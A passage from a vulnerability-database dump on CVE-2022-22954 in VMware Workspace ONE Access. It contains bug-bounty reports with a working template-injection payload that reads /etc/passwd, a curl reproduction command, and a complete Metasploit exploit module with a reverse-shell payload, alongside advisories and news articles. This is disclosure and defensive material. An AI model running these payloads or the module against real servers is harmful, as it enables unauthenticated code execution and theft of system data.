URL:**\n\nhttps://\u2588\u2588\u2588\u2588/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nVMware workspace One\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Visit the vulnerable URL **https://\u2588\u2588\u2588\u2588** and Intercept the request in burp suite\n* Append the following endpoint **/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d** and analyze the response you will see the contents of **/etc/passwd**\n\n**Request:**\n\n```\nGET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nCookie: LOGIN_XSRF=NSlYKinVNwgOtuT; JSESSIONID=A86B60C5FD0B58346764D1FB01DAF155\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nCache-Control: max-age=0\nTe: trailers\nConnection: close\n```\n\n**Response:**\n\n```\nHTTP/1.1 400 \nVary: Origin\nVary: Access-Control-Request-Method\nVary: Access-Control-Request-Headers\nSet-Cookie: EUC_XSRF_TOKEN=6386e149-ff55-4a34-b474-30e6c0c62299; Path=/catalog-portal; Secure\nCache-Control: no-cache,private\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains\nX-Frame-Options: SAMEORIGIN\nContent-Type: text/html;charset=UTF-8\nContent-Language: en-US\nDate: Mon, 11 Apr 2022 15:03:40 GMT\nConnection: close\nContent-Length: 3576\n\n<!DOCTYPE HTML>\n<html xmlns=\"http://www.w3.org/1999/html\">\n<head>\n <title>Error Page</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\"/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"/>\n <style>\n body {\n background: #465361;\n }\n\n .error-container {\n position: fixed;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n -ms-transform: translate(-50%, -50%);\n text-align: center;\n width: 25%;\n background-color: #fff;\n padding: 20px;\n box-shadow: 0 3px 2px -2px rgba(0, 0, .5, 0.35);\n border-radius: 4px;\n }\n\n .error-img-container svg {\n width: 40px;\n }\n\n .error-text-heading {\n font-weight: bold;\n padding-top: 5px;\n padding-bottom: 10px;\n }\n\n .error-text-container a {\n text-decoration: none;\n }\n </style>\n</head>\n\n<body>\n<div class=\"error-container\">\n <div class=\"error-img-container\">\n <svg id=\"icon-warning-big\" xmlns=\"http://www.w3.org/2000/svg\" width=\"32\" height=\"32\" viewBox=\"0 0 32 32\">\n <path d=\"M28.48,24.65,17.64,5.88a1.46,1.46,0,0,0-1.28-.74h0a1.46,1.46,0,0,0-1.28.74L4.25,24.64a1.48,1.48,0,0,0,1.28,2.22H27.2a1.48,1.48,0,0,0,1.28-2.21Zm-1.07.86a.24.24,0,0,1-.21.12H5.53a.24.24,0,0,1-.21-.37L16.15,6.49a.24.24,0,0,1,.21-.12h0a.24.24,0,0,1,.21.12L27.41,25.26A.23.23,0,0,1,27.41,25.51Z\"\n fill=\"#991700\" stroke-width=\"0\"/>\n <circle cx=\"16.36\" cy=\"13.53\" r=\"0.92\" fill=\"#f38b00\" stroke-width=\"0\"/>\n <path d=\"M16.36,16.43a.62.62,0,0,0-.62.62v5.55a.62.62,0,0,0,1.23,0V17A.62.62,0,0,0,16.36,16.43Z\"\n fill=\"#991700\" stroke-width=\"0\"/>\n </svg>\n </div>\n <div class=\"error-text-heading\">Request Failed</div>\n <div class=\"error-text-container\">\n <p>Please contact your IT Administrator.</p>\n <a href=\"/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D\">Sign Out</a>\n </div>\n</div>\n</body>\n<script>\n if (console && console.log) {\n console.log(\"auth.context.invalid\");\n console.log(\"Authorization context is not valid. Login request received with tenant code: \u2588\u2588\u2588\u2588\u2588\u2588\u2588, device id: root:x:0:0:root:/root:/bin/bash\\nbin:x:1:1:bin:/dev/null\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n }\n</script>\n</html>\n```\n\n* As you can see the above response, which contains the response of **/etc/passwd** in the response\n\n## Suggested Mitigation/Remediation Actions\nUpdate the Instance to the latest version\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:17:31", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 vulnerable to CVE-2022-22954", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-29T13:58:40", "id": "H1:1537543", "href": "https://hackerone.com/reports/1537543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-16T16:32:20", "bounty": 0.0, "description": "I found that one of the targets belongs to DOD vulnerable to CVE-2022-22954 where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable URL:**\n\n\u2588\u2588\u2588=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nVMware workspace one\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Run the following curl command \n\n**Command Used:**\n\ncurl -sk -X GET -H \"Host: \u2588\u2588\u2588\u2588\u2588\u2588\" \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\"\n\n**Response:**\n\n```\n<!DOCTYPE HTML>\n<html xmlns=\"http://www.w3.org/1999/html\">\n <head>\n <title>Error Page</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\" />\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/catalog-portal/css/errorpage.css\">\n </head>\n\n <body>\n <div class=\"error-container\">\n <div class=\"error-img-container\">\n <img src=\"/catalog-portal/app/graphics/warning.svg\" class=\"warning-icon\">\n </div>\n <div class=\"error-text-heading\">Request Failed</div>\n <div class=\"error-text-container\">\n <p>Please contact your IT Administrator.</p>\n <a href=\"/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D\">Sign Out</a>\n </div>\n </div>\n </body>\n <script>\n if(console && console.log) {\n console.log(\"auth.context.invalid\");\n console.log(\"Authorization context is not valid. Login request received with tenant code: uhhz-lbr-004v, device id: \u2588\u2588\u2588\u2588\u2588;\n }\n </script>\n</html>\n```\n\n* As you can see the above response, which contains the response of /etc/passwd in the response\n\n## Suggested Mitigation/Remediation Actions\nUpgrade the instances to the latest version\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T16:41:20", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588 vulnerable to CVE-2022-22954", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-20T20:16:38", "id": "H1:1537694", "href": "https://hackerone.com/reports/1537694", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T10:07:42", "description": "A remote code execution vulnerability exists in VMware Workspace. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T00:00:00", "type": "checkpoint_advisories", "title": "VMware Workspace Remote Code Execution (CVE-2022-22954)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-08-25T00:00:00", "id": "CPAI-2022-0206", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-06-29T02:12:56", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Workspace ONE Access. Authentication is not required to exploit this vulnerability. The specific flaw exists within the customError.ftl template.\n\nThe issue results from the usage of unsafe freemarker syntax, specifically a call to eval on untrusted input. An attacker can leverage this vulnerability to execute code in the context of the horizon user.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0011.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-25T00:00:00", "type": "srcincite", "title": "SRC-2022-0005 : VMware Workspace ONE Access customError.ftl Server-side Template Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-06T00:00:00", "id": "SRC-2022-0005", "href": "https://srcincite.io/advisories/src-2022-0005/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC\n 'wvu' # Exploit and independent analysis\n ],\n 'References' => [\n ['CVE', '2022-22954'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],\n ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],\n ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],\n ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']\n # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433\n ],\n 'DisclosureDate' => '2022-04-06',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n\n deregister_options('VHOST')\n end\n\n def check\n ret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\")\n\n return CheckCode::Unknown unless ret\n return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)\n\n CheckCode::Vulnerable\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Pass cmd to bash without word splitting\n bash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\"\n\n vprint_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, ssti_uri),\n 'vhost' => rand_text_alphanumeric(8..16),\n 'vars_get' => {\n %w[code error].sample => rand_text_alphanumeric(8..16),\n # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html\n ssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")})\n }\n }, datastore['CmdExecTimeout'])\n\n return unless res\n return '' unless res.code == 400 && res.body.include?('auth.context.invalid')\n\n res.body\n end\n\n def ssti_uri\n %w[\n /catalog-portal/hub-ui\n /catalog-portal/hub-ui/byob\n /catalog-portal/ui\n /catalog-portal/ui/oauth/verify\n ].sample\n end\n\n def ssti_param\n %w[deviceType deviceUdid].sample\n end\n\nend", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb"}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "VMware Workspace ONE Access and Identity Manager allow for remote code execution due to server-side template injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T00:00:00", "type": "cisa_kev", "title": "VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-14T00:00:00", "id": "CISA-KEV-CVE-2022-22954", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-06-28T12:01:18", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) and Coast Guard Cyber Command (CGCYBER) released a [joint advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) warning the Log4Shell flaw is being abused by threat actors that are compromising public-facing VMware Horizon and Unified Access Gateway (UAG) servers.\n\nThe VMware Horizon is a platform used by administrators to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to the resources residing inside a network.\n\nAccording to the CISA, in one instance the advance persistent threat (APT) actor compromises the victim\u2019s internal network, procures a disaster recovery network, and extracts sensitive information. \u201cAs part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),\u201d CISA added.\n\n## **Attack Analysis **\n\nThe CGCYBER conducts a proactive threat hunting engagement at an organization that was compromised by the threat actors who exploited Log4Shell in VMware Horizon. This revealed that after gaining initial access to the victim system, the adversary uploaded a malware identified as \u201chmsvc.exe\u201d.\n\nThe researchers analyzed the sample of the hmsvc.exe malware and confirmed that the process masquerading as a legitimate Windows service and an altered version of SysInternals LogonSessions software.\n\nAccording to the researcher sample of hmsvc.exe malware was running with the highest privilege level on a Windows system and contains an embedded executable that allows threat actors to log keystrokes, upload and execute payloads.\n\n\u201cThe malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,\u201d The initial execution of malware created a scheduled task that is set to execute every hour.\n\nAccording to CISA in another onsite incident response engagement, they observed bi-directional traffic between the victim and the suspected APT IP address.\n\nThe attackers initially gain access to the victim\u2019s production environment (a set of computers where the user-ready software or update are deployed), by exploiting Log4Shell in unpatched VMware Horizon servers. Later CISA observed that the adversary uses Powershell scripts to perform lateral movements, retrieve and execute the loader malware with the capability to remotely monitor a system, gain reverse shell and exfiltrate sensitive information.\n\nFurther analysis revealed that attackers with access to the organization test and production environment leveraged [CVE-2022-22954](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>), an RCE flaw in VMware workspace ONE access and Identity manager. to implant the Dingo J-spy web shell,\n\n## **Incident Response and Mitigations**\n\nCISA and CGCYBER recommended multiple actions that should be taken if an administrator discovers compromised systems:\n\n 1. Isolate compromised system\n 2. Analyze the relevant log, data and artifacts.\n 3. All software should be updated and patched from the .\n 4. Reduce the non-essential public-facing hosting service to restrict the attack surface and implement DMZ, strict network access control, and WAF to protect against attack.\n 5. Organizations are advised to implement best practices for identity and access management (IAM) by introducing multifactor authentication (MFA), enforcing strong passwords, and limited user access.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T11:57:06", "type": "threatpost", "title": "Log4Shell Vulnerability Targeted in VMware Servers to Exfiltrate Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-06-28T11:57:06", "id": "THREATPOST:686B59F4D2481BE96E76E2A3166AAE9B", "href": "https://threatpost.com/log4shell-targeted-vmware-data/180072/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## **Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that\u2019s earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. \u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 